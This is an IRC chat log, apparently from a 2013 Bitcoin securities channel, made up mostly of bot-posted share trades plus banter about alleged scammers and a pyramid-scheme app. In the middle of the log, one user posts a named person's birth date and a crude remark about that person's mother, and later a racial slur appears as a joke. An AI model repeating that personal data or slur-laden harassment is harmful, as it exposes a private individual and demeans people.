[TAT.ASICMINER] 34 @ 0.0293 = 0.9962 BTC [+] Jun 14 21:52:26 [BTCTC] [ASICMINER-PT] 1 @ 2.898 BTC [-] Jun 14 21:53:15 [BTCTC] [ASICMINER-PT] 1 @ 2.89 BTC [-] Jun 14 21:56:54 [BTCTC] [CRYPTO-TRADE] 4 @ 0.15001 = 0.6 BTC [-] Jun 14 21:57:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.0293 = 0.1172 BTC [+] Jun 14 21:58:09 [BTCTC] [CRYPTO-TRADE] 2 @ 0.15 = 0.3 BTC [-] Jun 14 21:59:00 [BTCTC] [TAT.ASICMINER] 4 @ 0.0295 = 0.118 BTC [+] Jun 14 21:59:24 [BTCTC] [CRYPTO-TRADE] 1 @ 0.136 BTC [-] Jun 14 21:59:34 [HAVELOCK] [ASICM] 30 @ 0.0289999 = 0.87 BTC [-] Jun 14 21:59:36 [HAVELOCK] [ASICM] 137 @ 0.0289999 = 3.973 BTC [-] Jun 14 21:59:37 [HAVELOCK] [ASICM] 2 @ 0.02892 = 0.0578 BTC [-] Jun 14 21:59:38 [HAVELOCK] [ASICM] 75 @ 0.02877 = 2.1578 BTC [-] Jun 14 21:59:39 [HAVELOCK] [ASICM] 139 @ 0.02835 = 3.9407 BTC [-] Jun 14 21:59:39 [HAVELOCK] [ASICM] 106 @ 0.02833002 = 3.003 BTC [-] Jun 14 21:59:41 [HAVELOCK] [ASICM] 11 @ 0.0280001 = 0.308 BTC [-] Jun 14 21:59:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.0295 BTC [+] Jun 14 22:00:48 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1264 BTC [-] Jun 14 22:00:50 [BTCTC] [CRYPTO-TRADE] 2 @ 0.120343 = 0.2407 BTC [-] Jun 14 22:00:52 [BTCTC] [CRYPTO-TRADE] 2 @ 0.120342 = 0.2407 BTC [-] Jun 14 22:02:14 [BTCTC] [ASICMINER-PT] 1 @ 2.89 BTC [-] Jun 14 22:03:56 [BTCTC] [TAT.ASICMINER] 62 @ 0.0295 = 1.829 BTC [+] Jun 14 22:06:03 [BTCTC] [TAT.ASICMINER] 3 @ 0.0295 = 0.0885 BTC [+] Jun 14 22:07:38 [BTCTC] [ASICMINER-PT] 5 @ 2.899 = 14.495 BTC [+] Jun 14 22:09:16 [BTCTC] [ASICMINER-PT] 2 @ 2.899 = 5.798 BTC [+] Jun 14 22:09:34 [BTCTC] [ASICMINER-PT] 3 @ 2.9 = 8.7 BTC [+] Jun 14 22:10:21 [BTCTC] [CRYPTO-TRADE] 3 @ 0.157999 = 0.474 BTC [+] Jun 14 22:13:58 restarting havelock server to add a new harddrive Jun 14 22:14:02 ~ 1 minute downtime Jun 14 22:14:07 (if all goes well.. knocks on wood) Jun 14 22:14:31 SITE IS DOWN WTF Jun 14 22:14:34 :) Jun 14 22:15:33 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Jun 14 22:17:40 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Jun 14 22:17:52 hey guise mircea popescu is a scammor you idiots Jun 14 22:18:10 nowai we love mp no matter wat Jun 14 22:18:14 i gotta admit he's very smart and i hope he lets me have his babies Jun 14 22:18:16 all done Jun 14 22:18:35 stupid "waiting for network configuration" took 2 full minutes to timeout Jun 14 22:18:43 apparently there's something screwey in my network config that it thinks it couldnt activate Jun 14 22:18:47 (but the internet came up fine) Jun 14 22:18:59 you will be billed for 1-minute trading time Jun 14 22:19:08 heh Jun 14 22:19:12 do you know how much money i make in ONE minute!? Jun 14 22:19:25 lol if that was the case, i'd be billing YOU by the minute :) Jun 14 22:19:30 well that was a waste of effort. Jun 14 22:19:34 lol Jun 14 22:20:59 [BTCTC] [BITVPS] 100 @ 0.000708 = 0.0708 BTC [+] Jun 14 22:21:02 [HAVELOCK] [ASICM] 6 @ 0.0285001 = 0.171 BTC [+] Jun 14 22:21:04 http://upload.wikimedia.org/wikipedia/commons/7/79/I_lost_the_game.jpg Jun 14 22:21:09 this girl works as a stripper. Jun 14 22:21:13 i'd like to run a bet on that. Jun 14 22:22:15 havent you scammed enough people? Jun 14 22:23:09 [BTCTC] [ASICMINER-PT] 25 @ 2.9 = 72.5 BTC [+] Jun 14 22:23:12 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Jun 14 22:23:12 i think technically there's like 3 people in Africa somewhere Jun 14 22:23:13 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Jun 14 22:23:14 hidden i na shoe Jun 14 22:26:17 [BTCTC] [BASIC-MINING] 5 @ 0.7 = 3.5 BTC [+] Jun 14 22:26:54 Quote Jun 14 22:26:54 and because we hope to make some money on the side for the future. Jun 14 22:26:54 Sure. And some of you buy blocks of shares. Some of you bid on 50 shares @ 2.5 BTC. No. Give me some of that. I have REAL bills to pay, not "investment money" to throw around. Now, given that I'm not a beggar, and that I either work for my money, or take it (which is work, believe me), there's really only one way to get a piece of that action. Jun 14 22:27:04 apparently bitcointalk is attracting ever more bold scammors. Jun 14 22:28:30 this guy's logic is pretty good Jun 14 22:28:33 got link? Jun 14 22:28:43 https://bitcointalk.org/index.php?topic=229612.msg2476057#msg2476057 Jun 14 22:28:45 some scammer Jun 14 22:29:01 [HAVELOCK] [SDICE] 11 @ 0.23 = 2.53 BTC [+] Jun 14 22:29:01 oh yeah i recognize the name Jun 14 22:29:13 he sold the same shares to multiple people or umth Jun 14 22:29:50 haha nice pic of him Jun 14 22:30:15 [HAVELOCK] [ASICM] 34 @ 0.0285001 = 0.969 BTC [+] Jun 14 22:30:40 ;;rated kruniac Jun 14 22:30:40 You rated user kruniac on Sun Jun 9 09:25:53 2013, giving him a rating of -1, and supplied these additional notes: NOPENOPENOPE https://bitcointalk.org/index.php?topic=229612.0;all GETAFUCKINGHAIRCUT. Jun 14 22:32:53 i think the total contention is 1 share Jun 14 22:33:17 Garrott Gardner Birth Date 06/13/1984 Jun 14 22:33:27 total dorkface. he probably also goes under vampyr Jun 14 22:34:20 his mom is fuckable from the facebook associations Jun 14 22:34:28 oops overstepped Jun 14 22:34:35 everyone's mom is fuckable. by the definition of the term mom Jun 14 22:34:42 durrrr Jun 14 22:35:07 yo dawg lemme fuck dat mom Jun 14 22:35:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.0295 BTC [+] Jun 14 22:36:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.0299 = 0.0598 BTC [+] Jun 14 22:36:23 no matter how hard BitFunder tries, BTCTC share value for AM is always higher Jun 14 22:36:30 BF will get an edge Jun 14 22:36:37 than someone will buy like 50 shares on BTCTC Jun 14 22:36:42 then* Jun 14 22:36:48 it's kinda uncanny Jun 14 22:37:09 am i missing something? Jun 14 22:37:33 because BitFunder's funding method does not work Jun 14 22:37:44 I sent them an email, no reply Jun 14 22:37:57 so, I'm staying away forever Jun 14 22:38:02 hashpower.com recently expired also Jun 14 22:38:09 ;;seen Ukto Jun 14 22:38:11 Ukto was last seen in #bitcoin-assets 3 days, 18 hours, 41 minutes, and 10 seconds ago: [19:43] i got a disease last time i went in there <-- added to bitcoin quotes. :P Jun 14 22:38:36 pankkake, while I appreciate your view, c'mon Jun 14 22:39:12 you have trouble registering for a website so you write it off forever? Jun 14 22:39:15 also Jun 14 22:39:23 this has little to do with my topic Jun 14 22:39:37 jcpham i guess further proof that the only business model for that is having a pirate around. Jun 14 22:39:39 [BTCTC] [TAT.ASICMINER] 60 @ 0.0299 = 1.794 BTC [+] Jun 14 22:39:55 I'd rather pay more than sign up for a website that is very, very likely to have security holes and could lose all my money Jun 14 22:40:12 i'm saying there is a force that always buys up BTCTC in reaction to BF price going higher Jun 14 22:40:22 mircea_popescu almost makes mining seems like a zero sum game or failing endeavor? Jun 14 22:40:26 oh… Jun 14 22:40:31 no matter how you manipulate it Jun 14 22:41:28 i have quite large proof of this Jun 14 22:41:29 in that Jun 14 22:41:42 my position on BF is 12x larger than on BTCTC Jun 14 22:41:56 mining always is zero sum, what seem ? Jun 14 22:42:32 i snuck a joke in there Jun 14 22:42:37 it was dry Jun 14 22:43:00 lol Jun 14 22:52:35 [HAVELOCK] [ASICM] 34 @ 0.02959 = 1.0061 BTC [+] Jun 14 22:53:40 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [-] Jun 14 22:53:54 [BTCTC] [DMS.MINING] 18 @ 0.03075 = 0.5535 BTC [-] Jun 14 22:53:55 [BTCTC] [DMS.MINING] 50 @ 0.0309 = 1.545 BTC [+] Jun 14 22:54:44 [BTCTC] [DMS.SELLING] 19 @ 0.0366 = 0.6954 BTC [+] Jun 14 22:55:03 [BTCTC] [MININGCO.ETF] 1 @ 0.8 BTC [-] Jun 14 22:59:06 [BTCTC] [DMS.MINING] 14 @ 0.030999 = 0.434 BTC [+] Jun 14 23:00:56 Bahaha, I am the one nice romanian, apparently. A dubious title, but I'll take it! Jun 14 23:04:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.0299 = 0.0897 BTC [+] Jun 14 23:04:16 [BITFUNDER] [TAT.VIRTUALMINE] [PAID] 123,000 @ 0.00003223 Jun 14 23:04:29 [BTCTC] [TAT.ASICMINER] 25 @ 0.023 = 0.575 BTC [-] Jun 14 23:04:48 [BTCTC] [TAT.ASICMINER] 10 @ 0.023 = 0.23 BTC [-] Jun 14 23:05:03 [BTCTC] [TAT.ASICMINER] 25 @ 0.023 = 0.575 BTC [-] Jun 14 23:05:17 [BTCTC] [TAT.ASICMINER] 5 @ 0.0299 = 0.1495 BTC [+] Jun 14 23:05:34 [BTCTC] [COGNITIVE] 10 @ 0.29 = 2.9 BTC [-] Jun 14 23:06:00 [BTCTC] [BASIC-MINING] 2 @ 0.7 = 1.4 BTC [+] Jun 14 23:06:48 Hey mircea_popescu, have you heard of the new, smartphone-mediated pyramid scheme? Jun 14 23:09:17 http://ilivingapp.com/home.asp Jun 14 23:09:47 you pay a 9.95 monthly fee to run the app. For each person you refer to the program, you get 7 dollars. Jun 14 23:11:01 There is an elaborate incentives and bonuses structure. Jun 14 23:11:25 http://www.youtube.com/watch?v=gp1AaRRmztQ "It goes up to infinite levels": Absurd Jun 14 23:12:04 just give them you #SSN and bank acct routing info Jun 14 23:12:08 you are set to retire Jun 14 23:14:22 Heh, technically they're providing an overpriced program of weekly 'personal development videos', on top of the dodgy resource reallocation. Jun 14 23:14:57 [BTCTC] [TAT.ASICMINER] 25 @ 0.0298 = 0.745 BTC [-] Jun 14 23:15:50 [BTCTC] [TAT.ASICMINER] 130 @ 0.0299 = 3.887 BTC [+] Jun 14 23:16:06 We have combined three multi-billion dollar industries to create a viral phenomenon that will help you to... Jun 14 23:16:39 Get out of debt Jun 14 23:16:39 Prepare for retirement Jun 14 23:16:39 Have time freedom Jun 14 23:16:39 Work from home on your own hours Jun 14 23:16:39 Get Bitches. Jun 14 23:16:56 that's like 5 apps in one! Jun 14 23:17:29 cads hadnt no Jun 14 23:17:45 but good to know apple allows that but not bitcoin Jun 14 23:18:21 LOL, that bitcoin so ponzi- but this app is awesome Jun 14 23:18:40 [BTCTC] [ASICMINER-PT] 1 @ 2.95 BTC [+] Jun 14 23:18:48 just refer all your friends to a 10 minute video with a virus imbedded Jun 14 23:18:50 Q: Why do I need to put in my SSN to register? Jun 14 23:18:51 A: In order to be able to receive compensation, it is required by law that your SSN or a Tax ID be collected for tax purposes. If it weren't you would never be legally allowed to be paid. Jun 14 23:19:12 [BTCTC] [DMS.PURCHASE] 80 @ 0.066231 = 5.2985 BTC [-] Jun 14 23:19:46 Q: With the massive growth expected, is the plan in place to scale up the servers? Jun 14 23:19:46 A: Yes Jun 14 23:19:52 this FAQ is awesome Jun 14 23:20:08 Like they need your SSN to pay you $7 Jun 14 23:20:14 [BTCTC] [TAT.ASICMINER] 80 @ 0.029999 = 2.3999 BTC [+] Jun 14 23:20:17 people are so fn retarded Jun 14 23:20:18 rite... Jun 14 23:20:49 Q: Is it really safe for me to be entering my SSN and Credit Card details into your site? What kind of security do you offer? Jun 14 23:20:50 A: We understand that you're concerned about the security and privacy of your online transactions. We use GoDaddy SSL to ensure that your valuable data, such as credit card details, are encrypted when you interact with our site. We employ state-of-the-art data encryption to ensure safe and secure transactions to our site. Your computer and ours agree to transpose whatever we are sending into an unintelligible "hash" of characters, using a techno Jun 14 23:20:50 called SSL. For example: Jun 14 23:21:04 lol, the rhetoric is too hilarious Jun 14 23:21:24 but they have godaddy ssl Jun 14 23:21:28 so you know it is legit Jun 14 23:21:39 state-of-the-art is now a dirty word. Jun 14 23:21:44 like nigger. Jun 14 23:21:46 [BTCTC] [ASICMINER-PT] 3 @ 2.95 = 8.85 BTC [+] Jun 14 23:21:49 hahaha Jun 14 23:22:12 mircea_popescu does MPEX use godaddy ssl Jun 14 23:22:20 beat me too it Jun 14 23:22:24 because i'm not sure how i can trust it after reading this Jun 14 23:22:24 damn it Jun 14 23:22:27 mpex uses urmommy bbw Jun 14 23:23:40 all the internet is teaching me these days is that i need my own ponzi scheme Jun 14 23:23:57 instruction unclear. penis caught in atm Jun 14 23:24:08 Includes Delivery of the weekly video content, Jun 14 23:24:09 Access to the video archive, your own personal website, Jun 14 23:24:09 and the ability to earn from the matrix program Jun 14 23:24:22 Neo must run it Jun 14 23:24:26 oh man they have the matric program too! Jun 14 23:24:59 [BTCTC] [TAT.ASICMINER] 21 @ 0.0293 = 0.6153 BTC [-] Jun 14 23:25:05 [BTCTC] [TAT.ASICMINER] 2 @ 0.02915 = 0.0583 BTC [-] Jun 14 23:25:07 [BTCTC] [TAT.ASICMINER] 5 @ 0.02902 = 0.1451 BTC [-] Jun 14 23:25:08 [BTCTC] [TAT.ASICMINER] 24 @ 0.02901 = 0.6962 BTC [-] Jun 14 23:25:10 [BTCTC] [TAT.ASICMINER] 35 @ 0.029 = 1.015 BTC [-] Jun 14 23:26:38 [BTCTC] [ASICMINER-PT] 4 @ 2.95 = 11.8 BTC [+] Jun 14 23:26:39 [BTCTC] [TAT.ASICMINER] 59 @ 0.029 = 1.711 BTC [-] Jun 14 23:27:13 [BTCTC] [BASIC-MINING] 7 @ 0.7 = 4.9 BTC [+] Jun 14 23:27:47 mircea_popescu: don't feel too slighted: their app is not in the app store Jun 14 23:28:05 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.007 BTC [+] Jun 14 23:29:56 [BTCTC] [TAT.ASICMINER] 22 @ 0.029998 = 0.66 BTC [+] Jun 14 23:30:14 [BTCTC] [ASICMINER-PT] 3 @ 2.95 = 8.85 BTC [+] Jun 14 23:30:20 [BTCTC] [ASICMINER-PT] 1 @ 2.955 BTC [+] Jun 14 23:30:24 [BTCTC] [ASICMINER-PT] 1 @ 2.96 BTC [+] Jun 14 23:31:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.029998 = 0.06 BTC [+] Jun 14 23:31:17 [BTCTC] [TAT.ASICMINER] 38 @ 0.029999 = 1.14 BTC [+] Jun 14 23:33:32 [BTCTC] [ASICMINER-PT] 4 @ 2.96 = 11.84 BTC [+] Jun 14 23:35:39 [HAVELOCK] [ASICM] 2 @ 0.029575 = 0.0592 BTC [-] Jun 14 23:35:48 [BTCTC] [DMS.MINING] 80 @ 0.0301 = 2.408 BTC [-] Jun 14 23:37:49 [BTCTC] [ASICMINER-PT] 1 @ 2.959 BTC [-] Jun 14 23:40:02 [HAVELOCK] [ASICM] 2 @ 0.029575 = 0.0592 BTC [-] Jun 14 23:40:05 [BTCTC] [ASICMINER-PT] 1 @ 2.922 BTC [-] Jun 14 23:40:45 [BTCTC] [TAT.ASICMINER] 5 @ 0.0291 = 0.1455 BTC [-] Jun 14 23:41:29 [BTCTC] [DMS.MINING] 80 @ 0.0301 = 2.408 BTC [-] Jun 14 23:41:44 [BTCTC] [ASICMINER-PT] 1 @ 2.921 BTC [-] Jun 14 23:42:38 [BTCTC] [ASICMINER-PT] 2 @ 2.921 = 5.842 BTC [-] Jun 14 23:44:20 [BTCTC] [BASIC-MINING] 2 @ 0.71 = 1.42 BTC [+] Jun 14 23:44:44 [BTCTC] [COGNITIVE] 2 @ 0.311 = 0.622 BTC [+] Jun 14 23:44:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.029999 = 0.06 BTC [+] Jun 14 23:45:29 [HAVELOCK] [ASICM] 4 @ 0.029 = 0.116 BTC [-] Jun 14 23:45:31 [BTCTC] [ASICMINER-PT] 3 @ 2.9579 = 8.8737 BTC [+] Jun 14 23:45:38 [HAVELOCK] [ASICM] 7 @ 0.02860001 = 0.2002 BTC [-] Jun 14 23:45:39 [HAVELOCK] [ASICM] 37 @ 0.0286 = 1.0582 BTC [-] Jun 14 23:45:41 [HAVELOCK] [ASICM] 16 @ 0.0285001 = 0.456 BTC [-] Jun 14 23:45:41 [HAVELOCK] [ASICM] 42 @ 0.028 = 1.176 BTC [-] Jun 14 23:45:52 [BTCTC] [ASICMINER-PT] 3 @ 2.957 = 8.871 BTC [-] Jun 14 23:46:08 [BTCTC] [DMS.PURCHASE] 36 @ 0.066231 = 2.3843 BTC [-] Jun 14 23:47:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.02911 BTC [-] Jun 14 23:48:16 [BTCTC] [TAT.ASICMINER] 16 @ 0.0298 = 0.4768 BTC [+] Jun 14 23:48:18 [HAVELOCK] [ASICM] 2 @ 0.02949999 = 0.059 BTC [+] Jun 14 23:52:06 [BTCTC] [ASICMINER-PT] 1 @ 2.9569 BTC [-] Jun 14 23:53:35 [BTCTC] [DMS.MINING] 36 @ 0.0301 = 1.0836 BTC [-] Jun 14 23:55:00 [BTCTC] [DMS.PURCHASE] 17 @ 0.066231 = 1.1259 BTC [-] Jun 14 23:56:54 [BTCTC] [BASIC-MINING] 4 @ 0.705 = 2.82 BTC [-] Jun 14 23:57:50 [BTCTC] [ASICMINER-PT] 1 @ 2.9539 BTC [-] Jun 14 23:58:10 [BTCTC] [TAT.ASICMINER] 13 @ 0.02978 = 0.3871 BTC [-] Jun 14 23:58:48 [BTCTC] [TAT.ASICMINER] 14 @ 0.02978 = 0.4169 BTC [-] Jun 15 00:00:42 cads a ok Jun 15 00:01:08 [BTCTC] [DMS.MINING] 17 @ 0.0301 = 0.5117 BTC [-] Jun 15 00:01:21 [BTCTC] [ASICMINER-PT] 1 @ 2.953 BTC [-] Jun 15 00:01:23 [BTCTC] [ASICMINER-PT] 1 @ 2.9539 BTC [+] Jun 15 00:01:24 [BTCTC] [ASICMINER-PT] 1 @ 2.954 BTC [+] Jun 15 00:01:26 [BTCTC] [ASICMINER-PT] 1 @ 2.955 BTC [+] Jun 15 00:06:16 [BTCTC] [DMS.SELLING] 25 @ 0.0365 = 0.9125 BTC [-] Jun 15 00:07:29 [BTCTC] [DMS.PURCHASE] 33 @ 0.066231 = 2.1856 BTC [-] Jun 15 00:10:44 [BTCTC] [BTC-BOND] 1 @ 0.0099 BTC [-] Jun 15 00:10:47 [BTCTC] [BTC-BOND] 1 @ 0.0099 BTC [-] Jun 15 00:10:49 [BTCTC] [BTC-BOND] 1 @ 0.00987 BTC [-] Jun 15 00:10:53 [HAVELOCK] [ASICM] 5 @ 0.029201 = 0.146 BTC [-] Jun 15 00:11:03 [BTCTC] [ASICMINER-PT] 3 @ 2.957 = 8.871 BTC [+] Jun 15 00:11:05 [BTCTC] [ASICMINER-PT] 1 @ 2.9579 BTC [+] Jun 15 00:12:25 [BTCTC] [BTC-BOND] 1 @ 0.00987 BTC [-] Jun 15 00:12:58 [BTCTC] [BTC-BOND] 10 @ 0.009853 = 0.0985 BTC [-] Jun 15 00:13:28 [HAVELOCK] [ASICM] 10 @ 0.02949998 = 0.295 BTC [+] Jun 15 00:13:30 [BTCTC] [BTC-BOND] 111 @ 0.009851 = 1.0935 BTC [-] Jun 15 00:14:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.02949 = 0.2949 BTC [-] Jun 15 00:14:10 [BTCTC] [BTC-BOND] 1 @ 0.00982 BTC [-] Jun 15 00:14:37 [BTCTC] [BTC-BOND] 10 @ 0.009812 = 0.0981 BTC [-] Jun 15 00:15:15 [BTCTC] [BTC-BOND] 10 @ 0.0098 = 0.098 BTC [-] Jun 15 00:15:25 [BTCTC] [TAT.ASICMINER] 3 @ 0.02949 = 0.0885 BTC [-] Jun 15 00:15:43 [BTCTC] [BTC-BOND] 10 @ 0.009767 = 0.0977 BTC [-] Jun 15 00:15:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.0298 = 0.0894 BTC [+] Jun 15 00:16:07 [HAVELOCK] [ASICM] 5 @ 0.02949998 = 0.1475 BTC [+] Jun 15 00:16:15 [BTCTC] [BTC-BOND] 20 @ 0.009761 = 0.1952 BTC [-] Jun 15 00:16:26 [HAVELOCK] [ASICM] 2 @ 0.02949998 = 0.059 BTC [+] Jun 15 00:16:56 [BTCTC] [BTC-BOND] 100 @ 0.00976 = 0.976 BTC [-] Jun 15 00:17:26 [BTCTC] [ASICMINER-PT] 1 @ 2.9589 BTC [+] Jun 15 00:19:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.0298 BTC [+] Jun 15 00:19:46 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [-] Jun 15 00:22:09 [BTCTC] [TAT.ASICMINER] 13 @ 0.0298 = 0.3874 BTC [+] Jun 15 00:25:01 [HAVELOCK] [ASICM] 7 @ 0.02920101 = 0.2044 BTC [-] Jun 15 00:25:03 [HAVELOCK] [ASICM] 48 @ 0.029201 = 1.4016 BTC [-] Jun 15 00:25:07 [HAVELOCK] [ASICM] 2 @ 0.029201 = 0.0584 BTC [-] Jun 15 00:27:36 [BTCTC] [ASICMINER-PT] 1 @ 2.915 BTC [+] Jun 15 00:28:03 [BTCTC] [DMS.MINING] 5 @ 0.0309 = 0.1545 BTC [+] Jun 15 00:30:50 [BTCTC] [ASICMINER-PT] 1 @ 2.915 BTC [+] Jun 15 00:31:00 [BTCTC] [DMS.MINING] 282 @ 0.0301 = 8.4882 BTC [-] Jun 15 00:31:02 [BTCTC] [DMS.MINING] 102 @ 0.03005 = 3.0651 BTC [-] Jun 15 00:31:04 [BTCTC] [DMS.MINING] 2 @ 0.03001 = 0.06 BTC [-] Jun 15 00:31:06 [BTCTC] [DMS.MINING] 450 @ 0.03 = 13.5 BTC [-] Jun 15 00:32:59 [BTCTC] [ASICMINER-PT] 1 @ 2.915 BTC [+] Jun 15 00:34:13 [BTCTC] [ASICMINER-PT] 8 @ 2.915 = 23.32 BTC [+] Jun 15 00:37:15 [BTCTC] [PAJKA.BOND] 11 @ 0.087998 = 0.968 BTC [+] Jun 15 00:47:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.0298 BTC [+] Jun 15 00:48:23 [BTCTC] [DMS.SELLING] 14 @ 0.036001 = 0.504 BTC [-] Jun 15 00:48:26 [BTCTC] [DMS.SELLING] 136 @ 0.036 = 4.896 BTC [-] Jun 15 00:48:31 [BTCTC] [TAT.ASICMINER] 16 @ 0.0298 = 0.4768 BTC [+] Jun 15 00:48:35 [BTCTC] [TAT.ASICMINER] 18 @ 0.0298 = 0.5364 BTC [+] Jun 15 00:50:55 [BTCTC] [TAT.ASICMINER] 6 @ 0.02985 = 0.1791 BTC [+] Jun 15 00:51:52 anyone got some neteller monie Jun 15 00:54:59 [HAVELOCK] [ASICM] 4 @ 0.02949499 = 0.118 BTC [+] Jun 15 00:56:42 [BTCTC] [DMS.SELLING] 18 @ 0.03675 = 0.6615 BTC [+] Jun 15 00:59:07 [HAVELOCK] [ASICM] 3 @ 0.02949499 = 0.0885 BTC [+] Jun 15 01:03:44 mjr_ you there ? Jun 15 01:06:30 [BTCTC] [ASICMINER-PT] 1 @ 2.93 BTC [+] Jun 15 01:08:57 [BTCTC] [BASIC-MINING] 1 @ 0.705 BTC [-] Jun 15 01:11:54 [BTCTC] [TAT.VIRTUALMINE] 550 @ 0.007 = 3.85 BTC [+] Jun 15 01:12:25 [BTCTC] [TAT.ASICMINER] 34 @ 0.02985 = 1.0149 BTC [+] Jun 15 01:13:55 [BTCTC] [ASICMINER-PT] 1 @ 2.9586 BTC [+] Jun 15 01:14:17 [BTCTC] [TAT.ASICMINER] 6 @ 0.02985 = 0.1791 BTC [+] Jun 15 01:14:28 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Jun 15 01:15:09 [BTCTC] [ASICMINER-PT] 2 @ 2.9586 = 5.9172 BTC [+] Jun 15 01:18:57 [BTCTC] [DMS.SELLING] 2 @ 0.03675 = 0.0735 BTC [+] Jun 15 01:19:06 [BTCTC] [GSDPT] 1 @ 0.002724 BTC [+] Jun 15 01:19:51 [BTCTC] [DMS.SELLING] 17 @ 0.037 = 0.629 BTC [+] Jun 15 01:20:50 [BTCTC] [GSDPT] 1 @ 0.002724 BTC [+] Jun 15 01:21:25 [HAVELOCK] [ASICM] 2 @ 0.0294945 = 0.059 BTC [-] Jun 15 01:21:27 [HAVELOCK] [ASICM] 3 @ 0.0294945 = 0.0885 BTC [-] Jun 15 01:21:45 [BTCTC] [S.MPOE-PT] 2 @ 0.000705 = 0.0014 BTC [+] Jun 15 01:22:08 [HAVELOCK] [ASICM] 20 @ 0.0294945 = 0.5899 BTC [-] Jun 15 01:23:00 [BTCTC] [S.DICE-PT] 2 @ 0.00288 = 0.0058 BTC [+] Jun 15 01:23:04 [BTCTC] [ASICMINER-PT] 2 @ 2.959 = 5.918 BTC [+] Jun 15 01:23:38 [HAVELOCK] [ASICM] 175 @ 0.0294945 = 5.1615 BTC [-] Jun 15 01:23:54 [BTCTC] [ASICMINER-PT] 2 @ 2.96 = 5.92 BTC [+] Jun 15 01:27:58 [BTCTC] [TAT.ASICMINER] 3 @ 0.02962 = 0.0889 BTC [-] Jun 15 01:29:00 [BTCTC] [ASICMINER-PT] 3 @ 2.958 = 8.874 BTC [-] Jun 15 01:31:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.02962 = 0.0592 BTC [-] Jun 15 01:32:15 [BTCTC] [S.DICE-PT] 50 @ 0.00288 = 0.144 BTC [+] Jun 15 01:33:01 [BTCTC] [COGNITIVE] 1 @ 0.318 BTC [+] Jun 15 01:35:40 [BTCTC] [ASICMINER-PT] 1 @ 2.954 BTC [-] Jun 15 01:38:38 [BTCTC] [ASICMINER-PT] 2 @ 2.952 = 5.904 BTC [-] Jun 15 01:39:09 ;;bc,stats Jun 15 01:39:10 Current Blocks: 241571 | Current Difficulty: 1.5605632681285927E7 | Next Difficulty At Block: 241919 | Next Difficulty In: 348 blocks | Next Difficulty In About: 1 day, 23 hours, 27 minutes, and 16 seconds | Next Difficulty Estimate: 19350149.6024 | Estimated Percent Change: 23.99465 Jun 15 01:39:27 [BTCTC] [ASICMINER-PT] 3 @ 2.953 = 8.859 BTC [+] Jun 15 01:40:04 [BTCTC] [TAT.ASICMINER] 8 @ 0.023 = 0.184 BTC [-] Jun 15 01:40:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.02913 = 0.2913 BTC [+] Jun 15 01:40:45 [BTCTC] [TAT.ASICMINER] 33 @ 0.0297 = 0.9801 BTC [+] Jun 15 01:40:55 [BTCTC] [TAT.ASICMINER] 12 @ 0.023 = 0.276 BTC [-] Jun 15 01:41:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.02913 = 0.0583 BTC [+] Jun 15 01:41:27 [BTCTC] [TAT.ASICMINER] 4 @ 0.023 = 0.092 BTC [-] Jun 15 01:43:34 [BTCTC] [ASICMINER-PT] 1 @ 2.955 BTC [+] Jun 15 01:45:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.02913 = 0.0583 BTC [+] Jun 15 01:45:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.023 = 0.046 BTC [-] Jun 15 01:47:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.0293 BTC [+] Jun 15 01:48:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.02913 = 0.1457 BTC [-] Jun 15 01:49:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.0297 BTC [+] Jun 15 01:50:55 [BTCTC] [S.MPOE-PT] 2 @ 0.000644 = 0.0013 BTC [-] Jun 15 01:50:58 [BTCTC] [TAT.ASICMINER] 6 @ 0.029699 = 0.1782 BTC [-] Jun 15 01:51:00 [BTCTC] [ASICMINER-PT] 1 @ 2.96 BTC [+] Jun 15 01:54:44 [BTCTC] [ASICMINER-PT] 14 @ 2.96 = 41.44 BTC [+] Jun 15 01:59:43 [HAVELOCK] [ASICM] 3 @ 0.02949499 = 0.0885 BTC [+] Jun 15 02:15:58 [HAVELOCK] [ASICM] 60 @ 0.029 = 1.74 BTC [-] Jun 15 02:16:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.029698 = 0.0891 BTC [-] Jun 15 02:16:02 [BTCTC] [TAT.ASICMINER] 13 @ 0.029699 = 0.3861 BTC [+] Jun 15 02:16:04 [BTCTC] [TAT.ASICMINER] 4 @ 0.02985 = 0.1194 BTC [+] Jun 15 02:16:13 [BTCTC] [TAT.ASICMINER] 70 @ 0.029899 = 2.0929 BTC [+] Jun 15 02:25:58 [BTCTC] [ASICMINER-PT] 3 @ 2.97 = 8.91 BTC [+] Jun 15 02:28:51 [BTCTC] [TAT.ASICMINER] 4 @ 0.02915 = 0.1166 BTC [-] Jun 15 02:29:50 [BTCTC] [ASICMINER-PT] 1 @ 2.97 BTC [+] Jun 15 02:32:25 [BTCTC] [ASICMINER-PT] 1 @ 2.985 BTC [+] Jun 15 02:33:04 [MPEX] [S.MPOE] 5800 @ 0.00070734 = 4.1026 BTC [+] Jun 15 02:33:13 [MPEX] [S.MPOE] 1971 @ 0.00070954 = 1.3985 BTC [+] Jun 15 02:34:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.0256 = 